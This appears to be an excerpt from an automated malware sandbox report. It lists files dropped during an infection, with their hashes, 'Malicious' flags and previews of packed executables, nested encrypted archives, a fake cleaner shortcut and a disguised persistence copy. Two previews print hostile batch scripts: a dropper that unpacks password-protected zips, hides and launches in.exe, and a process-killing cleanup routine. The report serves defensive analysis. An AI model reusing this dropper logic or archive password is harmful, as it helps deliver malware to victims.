Preview:	Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2355713
Entropy (8bit):	5.891648193754473
Encrypted:	false
SSDEEP:
MD5:	579A63BEBCCBACAB8F14132F9FC31B89
SHA1:	FCA8A51077D352741A9C1FF8A493064EF5052F27
SHA-256:	0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
SHA-512:	4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
Malicious:	false
Reputation:	unknown
Preview:	KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1799594
Entropy (8bit):	7.99773141173711
Encrypted:	true
SSDEEP:
MD5:	5659EBA6A774F9D5322F249AD989114A
SHA1:	4BFB12AA98A1DC2206BAA0AC611877B815810E4C
SHA-256:	E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
SHA-512:	F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
Malicious:	true
Reputation:	unknown
Preview:	PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..

C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799748
Entropy (8bit):	7.997729415613798
Encrypted:	true
SSDEEP:
MD5:	5404286EC7853897B3BA00ADF824D6C1
SHA1:	39E543E08B34311B82F6E909E1E67E2F4AFEC551
SHA-256:	EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
SHA-512:	C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
Malicious:	true
Reputation:	unknown
Preview:	PK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./

C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799902
Entropy (8bit):	7.997726708945573
Encrypted:	true
SSDEEP:
MD5:	5EB39BA3698C99891A6B6EB036CFB653
SHA1:	D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
SHA-256:	E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
SHA-512:	6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..

C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800056
Entropy (8bit):	7.997723543142523
Encrypted:	true
SSDEEP:
MD5:	7187CC2643AFFAB4CA29D92251C96DEE
SHA1:	AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
SHA-256:	C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
SHA-512:	27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800210
Entropy (8bit):	7.997720745184939
Encrypted:	true
SSDEEP:
MD5:	B7D1E04629BEC112923446FDA5391731
SHA1:	814055286F963DDAA5BF3019821CB8A565B56CB8
SHA-256:	4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
SHA-512:	79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800364
Entropy (8bit):	7.997716835838842
Encrypted:	true
SSDEEP:
MD5:	0DC4014FACF82AA027904C1BE1D403C1
SHA1:	5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
SHA-256:	A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
SHA-512:	CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..

C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3473559
Entropy (8bit):	7.9992359395959935
Encrypted:	true
SSDEEP:
MD5:	CEA368FC334A9AEC1ECFF4B15612E5B0
SHA1:	493D23F72731BB570D904014FFDACBBA2334CE26
SHA-256:	07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
SHA-512:	BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..\|...$..}.`..8......lV1..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T......A..\|...{A.p{.b*.\|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.\|.g....&.d..Y.\|..5O...s.\|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Users\user\AppData\Local\Temp\main\file.bin

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\main.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.0791308599041844
Encrypted:	false
SSDEEP:
MD5:	3626532127E3066DF98E34C3D56A1869
SHA1:	5FA7102F02615AFDE4EFD4ED091744E842C63F78
SHA-256:	2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
SHA-512:	DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
Malicious:	false
Reputation:	unknown
Preview:	..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023405199003427007
Encrypted:	false
SSDEEP:
MD5:	72E6EB9DEED67E1BFCC07377DBC0019B
SHA1:	2213A7F2630FDD791CA4686B6D6EE8B755B85C35
SHA-256:	87D6859A2DE5B9D7D12D97669E71A1295611A51831D4929DC0A5AE6A630AB8F3
SHA-512:	2E9D7BE2F3442A3E2BD6F04E7A9D49465A166E2844C9438FB152182630D7FCDDC90C6ECB21EC0065792E31AACD19997645E0A429F120428A71BABB4AB984941F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fg...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Users\user\Desktop\Cleaner.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Sun Dec 22 00:19:00 2024, mtime=Sun Dec 22 00:19:00 2024, atime=Sun Dec 22 00:19:00 2024, length=1502720, window=hide
Category:	dropped
Size (bytes):	2233
Entropy (8bit):	3.9088124423663557
Encrypted:	false
SSDEEP:
MD5:	F8260FD68F3E86BF40E6AC6388F1F479
SHA1:	202A521AED2C623AF0090C8CF61BD20B91531FCA
SHA-256:	0598E27E60C98D2932275541EE8349243357469A50193E52BA8A35ADA80218D9
SHA-512:	36CA25CE322BC704F8B602F27CD2D97B86D9AD72699D6C83EEB7F20E568CB35DB8123D68BBFF6883AD393EA4DB50C9F7BCF96724C609746919EDDEBB6B95508E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. .....${.T....${.T....${.T..........................F.:..DG..Yr?.D..U..k0.&...&......vk.v....O...T...#F{.T......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y/...Local.<......CW.^.Y0.....b.....................2wc.L.o.c.a.l.....N.1......Y`...Temp..:......CW.^.Y`.....l......................(.T.e.m.p.......1......YZ...YVDVBF~1..j......YZ..YZ.....D.........................Y.V.D.V.B.f.F.G.R.3.e.A.e.B.e.w.w.D.9.v.e.w.W.w.V.e.0.B.....h.2......Ya. .Y-CLEA~1.EXE..L......Ya..Ya...........................!...Y.-.C.l.e.a.n.e.r...e.x.e.......{...............-.......z...........j.}......C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.@.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.Y.V.D.V.B.f.F.G.R.3.e.A.e.B.e.w.w.D.9.v.e.w.W.w.V.e.0.B.\.Y.-.C.l.e.a.n.e.r...e.x.e.L.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\

C:\Users\user\Documents\DBAEGCGCGI.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3263488
Entropy (8bit):	6.675956678732107
Encrypted:	false
SSDEEP:
MD5:	CF6393E173FB6315D0C681BC78EB3528
SHA1:	26DC307AE4EA1866D40C9A34E38768733EC30B34
SHA-256:	3DEE7134CBEEA75160519A338FC848A18AF80C46EF475FCD3C69A463D449C35D
SHA-512:	47E722C9F4736FAF9612AFF748CB4E1211E00FFE0FE56A65DC0DBEC07F7B5E81908269D7C31066250866F3459727874D88C27FA88BE08E540D0EB1E048CED61F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2.......1...@.................................W...k.............................1.............................D.1..................................................... . ............................@....rsrc...............................@....idata ............................@...dblbhqnk..+.......+.................@...rrjzixml......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	321
Entropy (8bit):	4.99323851364312
Encrypted:	false
SSDEEP:
MD5:	7225D8C283F7B303692A163301880199
SHA1:	7BF7F829E108693DB3DAD66B557EAA1DBA464D94
SHA-256:	19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
